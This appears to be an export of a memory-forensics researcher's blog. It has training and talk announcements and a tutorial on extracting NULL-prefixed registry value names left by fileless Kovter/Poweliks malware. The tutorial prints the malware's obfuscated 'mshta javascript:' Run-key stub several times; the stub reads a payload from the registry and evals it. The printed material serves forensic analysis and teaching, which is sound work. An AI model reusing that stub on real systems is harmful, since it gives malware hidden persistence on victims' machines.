tag:blogger.com,1999:blog-305429382024-02-08T00:24:41.988-05:00JL's stuffa boring blog about my interests, projects and research...Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.comBlogger112125tag:blogger.com,1999:blog-30542938.post-48134388295841161052016-05-25T16:39:00.000-04:002016-05-25T16:39:20.190-04:00Enfuse MaterialsI'd like to thank everyone for coming to my talks at Enfuse 2016. As promised, here are the materials for the course. I ask that you don't redistribute the materials elsewhere. You must use the password given to you in class, and the link will expire in 30 days:<br />
<br />
<a href="https://www.dropbox.com/sh/j5svwjm7kse28i3/AACBTcZQYPgikxYPx_c3E7Apa?dl=0">https://www.dropbox.com/sh/j5svwjm7kse28i3/AACBTcZQYPgikxYPx_c3E7Apa?dl=0</a><br />
<br />
For those who were asking about other available memory samples, we have several available on the <a href="https://github.com/volatilityfoundation/volatility/wiki/Memory-Samples">Volatility Wiki</a>. We also have memory samples available from our <a href="http://www.memoryanalysis.net/#!amf/cmg5">training website</a>, as well as a lab guide and answer sheet for those of you who asked about using memory samples for your college course materials.
As always, feel free to send me an email if you have any Volatility issues or questions.Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com2tag:blogger.com,1999:blog-30542938.post-29594217305579306922016-01-29T17:03:00.000-05:002016-01-29T17:03:08.956-05:00Registry Value Names Starting with NULL CharactersRecently someone had asked on a mailing list about how to extract the registry value names that were created by a particular piece of malware. The issue was a <tt>NULL</tt> (<tt>0x0</tt>) character at the beginning of the registry value name, which prevented <tt>regedit</tt> from opening the registry key. The name is actually there, however, and consists of this <tt>NULL</tt> character and some other hex numbers, and you are able to extract it from the raw registry itself (from disk and memory). We'll cover how we may accomplish these tasks, and then we'll cover how to accomplish this over the enterprise, as was asked as a followup question.<br />
<h2>Background</h2>
The malware in question is referenced in a <a href="http://www.symantec.com/connect/blogs/kovter-malware-learns-poweliks-persistent-fileless-registry-update">report by Symantec</a> as well as <a href="https://reaqta.com/2015/09/poweliks-file-less-malware-keeps-evolving/">REAQTA</a>. We have two different registry values depending on whether or not Powershell is available on machine. Either way, the registry keys and values created by the malware are present in the user's personal registry (<tt>NTUSER.DAT</tt>).
<h2>
Extracting the Registry</h2>
For this part, you may use anything that allows you to pull the registry file from the disk. Some example tools may be:
<ul><li><a href="http://accessdata.com/product-download/digital-forensics/ftk-imager-version-3.2.0">FTK Imager</a></li>
<li><a href="https://www.x-ways.net/forensics/index-m.html">X-Ways</a></li>
<li><a href="https://www2.guidancesoftware.com/products/Pages/encase-forensic/overview.aspx">EnCase</a></li>
<li><a href="http://www.sleuthkit.org/">Sleuthkit</a> (or Autopsy if you need a GUI)</li>
</ul>
We're going to use the Sleuthkit to extract the registry file from the local disk in this case (though the process would be the same for an offline or remote disk, just the disk name would differ). So first we need to figure out the offset of the NTFS volume. In order to accomplish that, we would use the <tt>mmls</tt> utility; we see its invocation on line <b>1</b> below. The volume offset is highlighted on line <b>9</b> and we see that it is the only NTFS volume on this disk. Next, we need to get the unique identifying information (<tt>inode</tt>) for the <tt>NTUSER.DAT</tt> registry file for the user who ran the malware (<b>lines 11-23</b>). After we've identified the <tt>inode</tt> number for the registry file (372), we then extract it from the disk so that we may process it offline (<b>line 26</b>).
<pre><p class="code1">
1 <b>>mmls \\.\PhysicalDrive0</b>
2 DOS Partition Table
3 Offset Sector: 0
4 Units are in 512-byte sectors
5
6 Slot Start End Length Description
7 00: Meta 0000000000 0000000000 0000000001 Primary Table (#0)
8 01: ----- 0000000000 0000002047 0000002048 Unallocated
9 02: 00:00 <b><span style="color: red;">0000002048</span></b> 0033552383 0033550336 <b><span style="color: red;">NTFS (0x07)</span></b>
10
11 <b>>fls -o 2048 -p -r \\.\physicaldrive0 > paths.txt</b>
12
13 <b>>findstr /i ntuser paths.txt</b>
15 r/r 10772-128-4: Users/Default/NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
16 r/r 41237-128-3: Users/Default/NTUSER.DAT
17 r/r 41238-128-4: Users/Default/NTUSER.DAT.LOG
18 r/r 10768-128-4: Users/Default/NTUSER.DAT.LOG1
19 r/r 41321-128-1: Users/Default/NTUSER.DAT.LOG2
20 r/r 10563-128-4: Users/Default/NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms
21 r/r 10773-128-4: Users/Default/NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms
22 r/r 433-128-1: Users/user/NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
23 <b><font color="red">r/r 372-128-1: Users/user/NTUSER.DAT</font></b>
24 [snip]
25
26 <b>>icat -o 2048 \\.\physicaldrive0 372 > ntuser-win7x86</b>
</p>
</pre>
<h2>
Print Keys and Values</h2>
Once we have the extracted registry file, we're able to print out the registry key and its values using any offline tool we have at our disposal. Here are a few:
<ul><li><a href="http://projects.sentinelchicken.org/reglookup/">RegLookup</a></li>
<li><a href="https://github.com/williballenthin/python-registry">Python-Registry</a></li>
<li><a href="https://github.com/keydet89/RegRipper2.8">RegRipper</a></li>
<li><a href="http://www.mitec.cz/wrr.html">Mitec WRR</a></li>
</ul>
RegLookup is a nice utility for printing out registry data. You can see an example output of the Run key below, however, note that the value name is not printed out. We are able to see everything else, however:
<pre><p class="code1">
<b>$ reglookup -p 'Software/Microsoft/Windows/CurrentVersion/Run' NTUSER-Win7x86.DAT</b>
PATH,TYPE,VALUE,MTIME
/Software/Microsoft/Windows/CurrentVersion/Run,KEY,,2016-01-15 21:49:46
/Software/Microsoft/Windows/CurrentVersion/Run/,SZ,mshta javascript:roh0Urp=\x22ehdEAR8I\x22;G9p=new%20ActiveXObject(\x22WScript.Shell\x22);c7r6vhuiFM=\x22moDW7uoJ5\x22;ibh29z=G9p.RegRead(\x22HKCU\x5C\x5Csoftware\x5C\x5Cf42603093a\x5C\x5C2e0575f8\x22);bZU38ElgI=\x229g95uXT\x22;eval(ibh29z);v4SXZYYP=\x22x2\x22;,
/Software/Microsoft/Windows/CurrentVersion/Run/,SZ,mshta javascript:hCLkQp43l=\x22GRB\x22;w5s1=new%20ActiveXObject(\x22WScript.Shell\x22);dXx1Yr6f=\x22uk\x22;S6RUd=w5s1.RegRead(\x22HKCU\x5C\x5Csoftware\x5C\x5Cf42603093a\x5C\x5C2e0575f8\x22);JTMRIu3=\x227Vi\x22;eval(S6RUd);Jkxju49At=\x225S\x22;,
</p></pre>
I also <a href="https://raw.githubusercontent.com/gleeda/misc-scripts/master/misc_python/printkey.py">wrote a script to use Python-Registry</a> in order to print out registry keys of interest. You can see example output from this below:
<pre> <p class="code1">
<b>$ python printkey.py NTUSER-Win7x86.DAT "Software\Microsoft\Windows\CurrentVersion\Run"</b>
Processing NTUSER-Win7x86.DAT
************************************************************************
cmi-createhive{6a1c4018-979d-4291-a7dc-7aed1c75b67c}\software\microsoft\windows\currentversion\run
VALUENAME: 996883f7
VALUE: mshta javascript:roh0Urp="ehdEAR8I";G9p=new%20ActiveXObject("WScript.Shell");c7r6vhuiFM="moDW7uoJ5";ibh29z=G9p.RegRead("HKCU\\software\\f42603093a\\2e0575f8");bZU38ElgI="9g95uXT";eval(ibh29z);v4SXZYYP="x2";
VALUENAME: e4263fbd
VALUE: mshta javascript:hCLkQp43l="GRB";w5s1=new%20ActiveXObject("WScript.Shell");dXx1Yr6f="uk";S6RUd=w5s1.RegRead("HKCU\\software\\f42603093a\\2e0575f8");JTMRIu3="7Vi";eval(S6RUd);Jkxju49At="5S";
Subkeys:
************************************************************************
</p></pre>
<a href="http://windowsir.blogspot.com/2016/01/more-registry-fun.html">Harlan Carvey also wrote a RegRipper plugin</a> to detect key and value names with NULL characters. Also, if you need a GUI, <a href="http://binaryforay.blogspot.com/2016/01/registry-values-starting-with-null.html">Eric Zimmerman's registry tool</a> also parses out these names correctly. So in short, you have a lot of options for parsing out these "broken" value names with offline tools.
<h2>
Printing Keys and Values Using Volatility</h2>
As you may guess, you can also get this information using <a href="https://github.com/volatilityfoundation/volatility">Volatility</a>, but it might not be as straightforward at first. For our first attempt, we will try to use the <tt>printkey</tt> plugin. Notice that the value name is actually blank in the output below (left side of the colon):
<pre><p class="code1">
<b>$ python vol.py -f Win7x86.vmem --profile=Win7SP1x86 printkey -K software\\microsoft\\windows\\currentversion\\run</b>
Volatility Foundation Volatility Framework 2.5
Legend: (S) = Stable (V) = Volatile
----------------------------
[snip]
Registry: \??\C:\Users\user\ntuser.dat
Key name: Run (S)
Last updated: 2016-01-15 21:49:45 UTC+0000
Subkeys:
Values:
REG_SZ : (S) mshta javascript:roh0Urp="ehdEAR8I";G9p=new%20ActiveXObject("WScript.Shell");c7r6vhuiFM="moDW7uoJ5";ibh29z=G9p.RegRead("HKCU\\software\\f42603093a\\2e0575f8");bZU38ElgI="9g95uXT";eval(ibh29z);v4SXZYYP="x2";
REG_SZ : (S) mshta javascript:hCLkQp43l="GRB";w5s1=new%20ActiveXObject("WScript.Shell");dXx1Yr6f="uk";S6RUd=w5s1.RegRead("HKCU\\software\\f42603093a\\2e0575f8");JTMRIu3="7Vi";eval(S6RUd);Jkxju49At="5S";
</p></pre>
<p>This is because of the way the String class was written. The actual name is still there, however, so we can extract it with <tt>volshell</tt>. In the code below, lines 4-7 import the RegistryApi to use the correct registry file (in this case the user name "user"). Line 8 gets the key of interest, the "Run" key (defined on line 6). Then lines 10-11 loop through the (raw) values contained for that key and print out the <tt>dt()</tt> function output for each value. </p>
<p>We can see on lines 15 and 25 that each of these value names have a length of 9, therefore, we should be able to extract a name for these values. We are able to see the raw value for this name by using the <tt>.v()</tt> function on the object of interest. In this case, we'll use it on the <tt>.Name</tt> member of the value. On lines 34-35, we can see that we get the correct length for the value name and on lines 36-37 we get the correct value name. We can then rerun our loop on line 39 in order to get the full information for these values.</p>
<pre><p class="code1">
<font color="blue"> 1</font> <b>$ python vol.py -f Win7x86.vmem --profile=Win7SP1x86 volshell</b>
<font color="blue"> 2</font> [snip]
<font color="blue"> 3</font>
<font color="blue"> 4</font> In [1]: import volatility.plugins.registry.registryapi as registryapi
<font color="blue"> 5</font> In [2]: regapi = registryapi.RegistryApi(self._config)
<font color="blue"> 6</font> In [3]: key = "software\\microsoft\\windows\\currentversion\\run"
<font color="blue"> 7</font> In [4]: regapi.set_current("NTUSER.DAT", "user")
<font color="blue"> 8</font> In [5]: item = regapi.reg_get_key(None, key)
<font color="blue"> 9</font>
<font color="blue"> 10</font> In [6]: for value, data in regapi.reg_yield_values(None, key, given_root = item, <b>raw = True</b>):
<font color="blue"> 11</font> print dt(value)
<font color="blue"> 12</font> ....:
<font color="blue"> 13</font> <CType pointer to [0x0007CC08]>
<font color="blue"> 14</font> 0x0 : Signature vk
<font color="blue"> 15</font> 0x2 : <b><font color="red">NameLength 9</font></b>
<font color="blue"> 16</font> 0x4 : DataLength 412
<font color="blue"> 17</font> 0x8 : Data 511024
<font color="blue"> 18</font> 0xc : Type 1
<font color="blue"> 19</font> 0x10 : Flags 1
<font color="blue"> 20</font> 0x12 : Spare 28515
<font color="blue"> 21</font> 0x14 : <b><font color="red">Name
<font color="blue"> 22</font> None</font></b>
<font color="blue"> 23</font> <CType pointer to [0x0007CDD0]>
<font color="blue"> 24</font> 0x0 : Signature vk
<font color="blue"> 25</font> 0x2 : <b><font color="red">NameLength 9</font></b>
<font color="blue"> 26</font> 0x4 : DataLength 378
<font color="blue"> 27</font> 0x8 : Data 517464
<font color="blue"> 28</font> 0xc : Type 1
<font color="blue"> 29</font> 0x10 : Flags 1
<font color="blue"> 30</font> 0x12 : Spare 0
<font color="blue"> 31</font> 0x14 : <b><font color="red">Name
<font color="blue"> 32</font> None</font></b>
<font color="blue"> 33</font>
<font color="blue"> 34</font> In [7]: <b>len(value.Name.v())</b>
<font color="blue"> 35</font> <b><font color="red">Out[7]: 9</font></b>
<font color="blue"> 36</font> In [8]: <b>print str(value.Name.v())</b>
<font color="blue"> 37</font> <b><font color="red">e4263fbd</font></b>
<font color="blue"> 38</font>
<font color="blue"> 39</font> In [9]: <b>for value, data in regapi.reg_yield_values(None, key, given_root = item, raw = True):
print value.Name.v(), data</b>
....:
<b><font color="red">996883f7</font></b> mshta javascript:roh0Urp="ehdEAR8I";G9p=new%20ActiveXObject("WScript.Shell");c7r6vhuiFM="moDW7uoJ5";ibh29z=G9p.RegRead("HKCU\\software\\f42603093a\\2e0575f8");bZU38ElgI="9g95uXT";eval(ibh29z);v4SXZYYP="x2";
<b><font color="red">e4263fbd</font></b> mshta javascript:hCLkQp43l="GRB";w5s1=new%20ActiveXObject("WScript.Shell");dXx1Yr6f="uk";S6RUd=w5s1.RegRead("HKCU\\software\\f42603093a\\2e0575f8");JTMRIu3="7Vi";eval(S6RUd);Jkxju49At="5S";
</p></pre>
<p>Unfortunately, that's all the time we have for today, but we'll continue this thought sometime next week. Until then, <a href="https://www.youtube.com/watch?v=Wkb8sl_VTAE">here's a bit of homework for you to watch</a> and <a href="https://raw.githubusercontent.com/gleeda/misc-scripts/master/fresponse/fresponse.bash">a bit to read</a>.
<p><b>Coming up next: Finding interesting registry values Enterprise-wide</b></p>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-15189862993391502362015-06-03T12:26:00.006-04:002015-06-03T12:27:11.744-04:00Volshell QuickiesSince someone had asked about it in a comment on this blog, I decided to write up a <a href="http://volatility-labs.blogspot.com/2015/06/volshell-quickie-case-of-missing.html">Volshell Quickie on the Volatility Labs blog</a>. Enjoy!Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-74172049399126538672015-05-18T14:40:00.000-04:002015-05-18T14:41:58.593-04:00Linux Memory Forensics: Using mprotect() with PROT_NONE In case you didn't catch it on the <a href="http://volatility-labs.blogspot.com/2015/05/using-mprotect-protnone-on-linux.html">Volatility Labs blog</a>, I found an interesting bug that we've had in the framework since we've had Linux support. If you've had cases that involved Linux samples and plugins like <tt>linux_yarascan</tt>, <tt>linux_strings</tt> etc, you might want to update to the latest code and have another look over those samples. Of course, there's no reason to think that a piece of malware might have used this trick and used a <tt>sigsegv</tt> handler to access the data, but <a href="http://metal-memenc.sourceforge.net/">the idea has been around for years...</a>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-44448123056235145152015-01-29T11:50:00.000-05:002015-01-29T11:50:49.181-05:00Some UpdatesWow, it's been a while since I've written here. <a href="http://volatility-labs.blogspot.com/2014/12/acquiring-memories-from-2014.html">A lot has happened since, however.</a> Here are a few updates:<br />
<br />
<h2>
The Book</h2>
We released a book: <i><a href="http://www.memoryanalysis.net/#!amf/cmg5">The Art of Memory Forensics</a></i>. For those of you who are considering teaching memory forensics or even operating systems, we have a syllabus and evidence files on our website that you may use in your classes. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://static.wixstatic.com/media/2cde34_e9745d20e7124c41bffb28e42a5244ec.png_srz_p_227_285_75_22_0.50_1.20_0.00_png_srz" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://static.wixstatic.com/media/2cde34_e9745d20e7124c41bffb28e42a5244ec.png_srz_p_227_285_75_22_0.50_1.20_0.00_png_srz" /></a></div>
<h2>
Trainings</h2>
We have <a href="http://www.memoryanalysis.net/#!training/c1o4z">several trainings</a> in line for this year, public and private. Public trainings currently include:<br />
<br />
<ul>
<li>Reston, VA April 13th-17th 2015</li>
<li>New York, NY May 11th-15th 2015</li>
<li>Amsterdam, NL August 31st-September 4th 2015</li>
</ul>
We are also currently working on new course offerings coming out this year. So keep an eye out for those!<br />
<br />
<h2>
Talks</h2>
<div>
I'll be speaking at the upcoming <a href="http://www.encase.com/ceic">CEIC conference</a> in Las Vegas, on Wednesday May 20th 2015. Apparently there is a discount code if you register before January 31st: JANS4v15</div>
<div>
<br /></div>
<div>
The Volatility team will also give another talk at <a href="http://www.meetup.com/NYC4SEC/">NYC4SEC</a> during the week of the training in NYC this coming May. More details will be given for that talk soon.</div>
<br />Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com5tag:blogger.com,1999:blog-30542938.post-77611710812570959092014-04-14T18:35:00.001-04:002014-04-14T18:36:05.825-04:00Volatility Talk at Upcoming NYC4SECThe Volatility team will give a talk at the next NYC4SEC meetup on memory forensics on May 8th, 2014 at John Jay College. Make sure to <a href="http://www.meetup.com/NYC4SEC/events/177092222/">RSVP if you are planning to attend</a>, since there is limited seating!<br />
<br />
<i><b> Thanks For the Memory: Rootkits, Exfil and APT - RAM Conquers All </b></i><br />
<br />
<i>The ability to perform digital investigations and incident response
is becoming a critical skill for many occupations. Unfortunately,
digital investigators frequently lack the training or experience to take
advantage of the volatile artifacts found in physical memory. Volatile
memory contains valuable information about the runtime state of the
system, provides the ability to link artifacts from traditional forensic
analysis (network, file system, registry), and provides the ability to
ascertain investigative leads that have been unbeknownst to most
analysts. Malicious adversaries have been leveraging this knowledge
disparity to undermine many aspects of the digital investigation process
with such things as anti-forensics techniques, memory resident malware,
kernel rootkits, encryption (file systems, network traffic, etc), and
Trojan defenses. The only way to turn-the-tables and defeat a creative
digital human adversary is through talented analysts.</i><br />
<i> </i><br />
<i>
</i><i>This talk demonstrates the importance of including Volatile memory in
your investigations with an overview of the most widely used memory
forensics tool, Volatility, by its developers.</i><br />
<br />
-<a href="https://twitter.com/gleeda">@gleeda </a><br />
<br />Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-72052721290479160742014-02-07T09:51:00.003-05:002014-02-07T09:51:54.052-05:00New Volatility Training WebsiteWe have a new website for all of our Volatility training opportunities. Don't forget to check it out: <a href="http://www.memoryanalysis.net/">http://www.memoryanalysis.net/</a><br />
<br />
- <a href="https://twitter.com/gleeda">@gleeda</a>Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-9266560549627190202014-01-30T08:45:00.001-05:002014-01-30T08:46:04.250-05:00OMFW 2013 SlidesIn case you missed it, I put up my slides for my OMFW 2013 talk "Every Step You Take: Profiling the System". You can find them here <a href="https://docs.google.com/presentation/d/1sW55qi4EOVEp9_-glUwVWIyUKrMZBFEl45dxawK-xf0/edit?usp=sharing">on google docs</a>. Some of the animations may not render properly, even if played, but you get the idea. If you want to see the <a href="http://volatility-labs.blogspot.com/2013/09/leveraging-cybox-with-volatility.html">cyboxer plugin</a>, send me an email (jamie.levy {at} gmail . com). Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com1tag:blogger.com,1999:blog-30542938.post-81744087649401170572013-07-16T12:39:00.000-04:002013-07-16T15:02:15.542-04:00Volatility NewsThings have been busy lately, but I want to let you know about some important items that are coming up quickly:<br />
<br />
<h2>
<b><span style="font-size: large;">July 27-30th, 2013: Blackhat Vegas</span></b></h2>
<br />
<a href="https://twitter.com/attrc">Andrew Case</a> and I will teach our course in <a href="https://www.blackhat.com/us-13/training/digital-forensics-and-incident-response.html">Digital Forensics and Incident Response</a> again this summer at Black Hat Vegas. This course will cover enough material to take someone from knowing practically nothing about digital forensics (disk and memory) to a point where s/he can comfortably conduct his/her own investigations. There is limited time to sign up, so reserve your seat while you can!<br />
<br />
You can hear Andrew talk about <a href="http://packetpushers.net/healthy-paranoia-show-14-digital-forensics-and-incident-response-with-andrew-case/">Digital Forensics and Incident Response</a> on the Healthy Paranoia podcast from July 7th, 2013.<br />
<br />
<h2>
<b><span style="font-size: large;">August 1st, 2013: Volatility Plugin Contest</span></b></h2>
<br />
The <a href="http://volatility-labs.blogspot.com/2013/01/the-1st-annual-volatility-framework.html">1st Annual Volatility Plugin Contest</a> deadline is quickly approaching! Don't miss this opportunity to win over $2000 in cash and prizes and contribute to the top memory forensics framework by writing a plugin for the <a href="http://code.google.com/p/volatility/">Volatility Framework</a> and submitting it to <u><b><span style="background-color: black; color: white;">volcon2013@memoryanalysis.net</span></b></u> by August 1st, 2013.<br />
<br />
<h2>
<b><span style="font-size: large;">September 9-13th, 2013: Volatility Training in the Netherlands</span></b></h2>
<br />
We will have our 4th public offering of our official <a href="http://volatility-labs.blogspot.com/2013/04/memory-forensics-training-netherlands.html"><i>Windows Malware and Memory Forensics</i> training</a> in the Netherlands September 9-13, 2013. This will be our <b>only</b> offering outside the US for this year. Past offerings of our course have been well received and were recently described as the <a href="http://volatility-labs.blogspot.com/2013/06/the-perfect-combination-of-ir-malware.html">"<i>... perfect combination of incident response, malware analysis and Windows internals.</i>"</a> Don't miss out on your chance to take this course and learn not only how to become a Volatility superuser, but how to apply cutting edge memory and malware analysis methodologies against your worst adversary.<br />
<br />
<h2>
<b><span style="font-size: large;">November 4th, 2013: Open Memory Forensics Workshop (OMFW)</span></b></h2>
<br />
<a href="https://www.volatilesystems.com/default/omfw">The <i>Open Memory Forensics Workshop</i> (OMFW) call for papers has been announced</a>. If you want to give a talk on memory forensics related topics, please get your submission in by <u><i>September 1st, 2013</i></u>. OMFW is a half-day workshop that will be held one day prior to the Open Source Digital Forensics Conference in Chantilly, VA. This workshop is fast-paced, to the point, highly technical and intended to raise the bar for analysts who realize the importance of memory forensics when faced with a highly skilled adversary. Not only will you learn a lot and get to meet all the movers and shakers in the space, but your $50 registration fee is entirely donated to charity! <a href="http://volatility.tumblr.com/post/13348425876/the-volatility-community-gives-back">Last year</a> all proceeds went to the <a href="http://www.missingkids.com/">National Center for Missing and Exploited Children</a>. So don't delay: there really is limited seating and it does go quickly. Make sure to register your seat now!<br />
<br />
<h2>
<b><span style="font-size: large;">November 5th, 2013: Open Source Digital Forensics Conference</span></b></h2>
<br />
The <a href="https://twitter.com/volatility">Volatility</a> team will be at the <i><a href="http://www.basistech.com/about-us/events/open-source-forensics-conference/">Open Source Digital Forensics Conference</a></i> discussing <i>The State of Volatility</i>. Come by and see us there :-)<br />
<br />
<h2>
<b><span style="font-size: large;">November 11-15th, 2013: Volatility Training in Reston, VA</span></b></h2>
<br />
We will have our 5th public offering of the official <a href="http://volatility-labs.blogspot.com/2013/06/memory-forensics-training-reston-va.html"><i>Windows Malware and Memory Forensics</i> training</a> in Reston, VA November 11-15th, 2013. If you missed the last offering in June, this is your chance to take this course and learn from the developers themselves. As I've <a href="http://gleeda.blogspot.com/2013/04/upcoming-events-and-trainings.html">stated before</a>, this class includes real-world scenarios that are reinforced with hands-on labs. We cover more than "just one tool" as some detractors like to say. We cover methodologies that will actually help you where some tools fail. You will have a deep enough understanding to investigate even the most skilled adversaries who know how to break common tools in order to hide. Don't be fooled and don't be left behind. Accept no imitations and make sure to take this class.<br />
<br />
All students who take the official <a href="https://twitter.com/volatility">Volatility</a> training receive a certificate of completion, with CPE credits that can be used for certification renewal. In addition to this, we are constantly updating the course with new material and <a href="https://twitter.com/volatility/status/347500624629334016">past students are given updated materials for FREE</a>. What more can you ask for? If you are interested in Volatility training, drop us a line at <u><b>voltraining [[ at ]] memoryanalysis.net</b></u><br />
<br />
If you want to see co-trainers <a href="https://twitter.com/iMHLv2">MHL</a> and <a href="https://twitter.com/attrc">Andrew Case (attrc)</a> in action, I managed to find a couple of videos of their previous talks on youtube:<br />
<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/OeG4KBWB-EY" width="560"></iframe><br />
<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="315" src="//www.youtube.com/embed/Khnas55TV0w" width="420"></iframe><br />
<br />
<br />Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-37001365982269127422013-04-19T11:46:00.000-04:002013-04-19T12:25:28.357-04:00Upcoming Events and TrainingsI have several speaking and training events that are coming up this year that may be of interest to others in the community: <br />
<br />
I will be speaking at the New York Banker's Association's upcoming <a href="http://www.nyba.com/events/10th-annual-technology-compliance-risk-management-forum/">Annual Technology, Compliance & Risk Management Forum</a> on May 16th, 2013 on the topic of Incident Response and Digital Forensics. If you plan to attend I'll see you there!<br />
<br />
Also we (Volatility) are holding our third run of <a href="http://volatility-labs.blogspot.com/2013/03/official-training-by-volatility.html">Windows Malware and Memory Forensics in Reston, VA</a> from Monday June 10th through Friday, June 14th 2013. This training will not disappoint even the most proficient of forensic/malware analysts. It includes real-world scenarios that are reinforced with hands-on labs. All students will leave with skills and confidence to conduct investigations involving RAM samples from acquisition to the final report. Students also leave with more than just being Volatility power users, they leave with a deeper knowledge of memory forensics and malware analysis methodologies. Such knowledge is integral regardless of what tools you choose for future investigations, be they open source or commercial, and much more powerful than simply "run this tool, the output is colored red so it's bad". You'll leave the class with knowledge that will help you to figure out if something really is "bad" or not. There are still a few seats left for this training, so if you are interested you should register soon. Send an email to <u><b><i>voltraining [at] memoryanalysis.net</i> </b></u>for registration information.<br />
<br />
If you are looking for a course that covers both disk and memory forensics, <a href="https://twitter.com/attrc">Andrew Case</a> and I will teach our course in <a href="https://www.blackhat.com/us-13/training/digital-forensics-and-incident-response.html">Digital Forensics and Incident Response</a> again this summer at Black Hat Vegas. This course runs from July 27th through July 30th 2013 and will cover enough material to take someone from knowing practically nothing about digital forensics to a point where s/he can comfortably conduct his/her own investigations.<br />
<br />
Also we (Volatility) will hold another run of Windows Malware and Memory Forensics in the Netherlands from Monday September 9th through Friday, September 13th 2013. Details will appear soon on the <a href="http://volatility-labs.blogspot.com/search/label/training">Volatility Labs blog</a>.<br />
<br />
Planning for the Open Memory Forensics Workshop (OMFW) is in progress. You should plan to attend if you want to know what's new and hot in the memory forensics space. OMFW is likely to take place on November 4th, 2013 one day prior to the <a href="http://www.basistech.com/about-us/events/open-source-forensics-conference/">Sleuth Kit and Open Source Digital Forensics Conference</a>. Final details will appear soon on the <a href="http://volatility-labs.blogspot.com/">Volatility Labs blog</a>.Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-17630446425610084402013-01-14T15:39:00.001-05:002013-01-14T15:40:06.918-05:00Windows Malware and Memory Forensics Training in The Windy City!<div class="tr_bq">
Cross posted from the <a href="http://volatility-labs.blogspot.com/2013/01/windows-malware-and-memory-forensics.html">Volatility Labs Blog</a>: </div>
<br />
<blockquote>
<span style="font-family: inherit;">The next journey to the center of Windows Memory Forensics starts in Chicago this March! </span> </blockquote>
<blockquote>
<span style="font-family: inherit;">We are pleased to announce the second public offering of the <i>Windows Malware and Memory Forensics Training by The Volatility Project</i>. This is the only memory forensics course officially designed,
sponsored, and taught by the Volatility developers. One of the main
reasons we made Volatility open-source is to encourage and facilitate a
deeper understanding of how memory analysis works, where the evidence
originates, and how to interpret the data collected by the framework's
extensive set of plugins. Now you can learn about these benefits first hand
from the developers of the most powerful, flexible, and innovative
memory forensics tool. </span><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">Appraisal from your peers who attended the first course this past December:</span><span style="font-family: inherit;"><br /></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikAXx-CGrd4Q5qX40IALjTlg1FhStGKLG27EZASjZkcyu33jaTMpufspZu09MNFCYPl4ThdWyvCa6e7GIMq6XPxUiot2jezhIfzhXLbv0_INH0cAkwconuaZo4iofHCMXpeOsx/s1600/5starimg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikAXx-CGrd4Q5qX40IALjTlg1FhStGKLG27EZASjZkcyu33jaTMpufspZu09MNFCYPl4ThdWyvCa6e7GIMq6XPxUiot2jezhIfzhXLbv0_INH0cAkwconuaZo4iofHCMXpeOsx/s400/5starimg.png" width="400" /></a><span style="font-family: inherit;"><br /></span><span style="font-family: inherit;">Please see the following details about the upcoming training event:</span><br />
Dates: Monday, March 18th through Friday, March 22nd 2013<br />
Location: Downtown Chicago, IL (exact location will be shared upon registration)<br />
Instructors: Michael Ligh (<a href="http://twitter.com/imhlv2">@iMHLv2</a>), Andrew Case (<a href="http://twitter.com/attrc">@attrc)</a>, Jamie Levy (<a href="http://twitter.com/gleeda">@gleeda</a>)<br />
For more information about the course, view the <a href="https://docs.google.com/open?id=0B6sJr6AdVULGaVQ0UDNBX1A4MjA">Volatility Training Flyer</a> (to download a copy of the PDF, click File > Download). To request a link to the online registration site or to receive a detailed course agenda/outline, please send an email voltraining [at] memoryanalysis.net.</blockquote>
Jamie Levyhttp://www.blogger.com/profile/16089000750284843256noreply@blogger.com0tag:blogger.com,1999:blog-30542938.post-80642399774069922012013-01-14T15:32:00.000-05:002013-01-14T15:34:47.344-05:00The 1st Annual Volatility Framework Plugin ContestCross posted from the <a href="http://volatility-labs.blogspot.com/2013/01/the-1st-annual-volatility-framework.html">Volatility Labs Blog:</a>
<br />
<br />
<blockquote>We are pleased to announce the 1st Annual Volatility Plugin Contest. This contest is inspired and modeled after the <a href="http://www.hex-rays.com/contests/index.shtml">Hex-Rays Plugin Contest</a>. As in the case of IDA, Volatility was designed with the belief that talented analysts should only be limited by their creativity not the tools they use. In this spirit, Volatility has a flexible architecture that can be extended in numerous ways: analysis plugins (operating system plugins, application plugins, etc), volshell commands, address spaces, profiles, or user interfaces. This contest is intended to inspire people to demonstrate their creativity, become a memory analysis pioneer, win the admiration of your peers, and give back to the community.<br />
<br />
The contest is straightforward: Create an innovative and useful extension to <a href="http://code.google.com/p/volatility/">The Volatility Framework</a> and win the contest!<br />
<br />
<ul>
<li>1st place wins one free seat at any future <a href="http://volatility-labs.blogspot.com/2013/01/windows-malware-and-memory-forensics.html">Windows Malware and Memory Forensics Training</a> *or* 1500 USD cash</li>
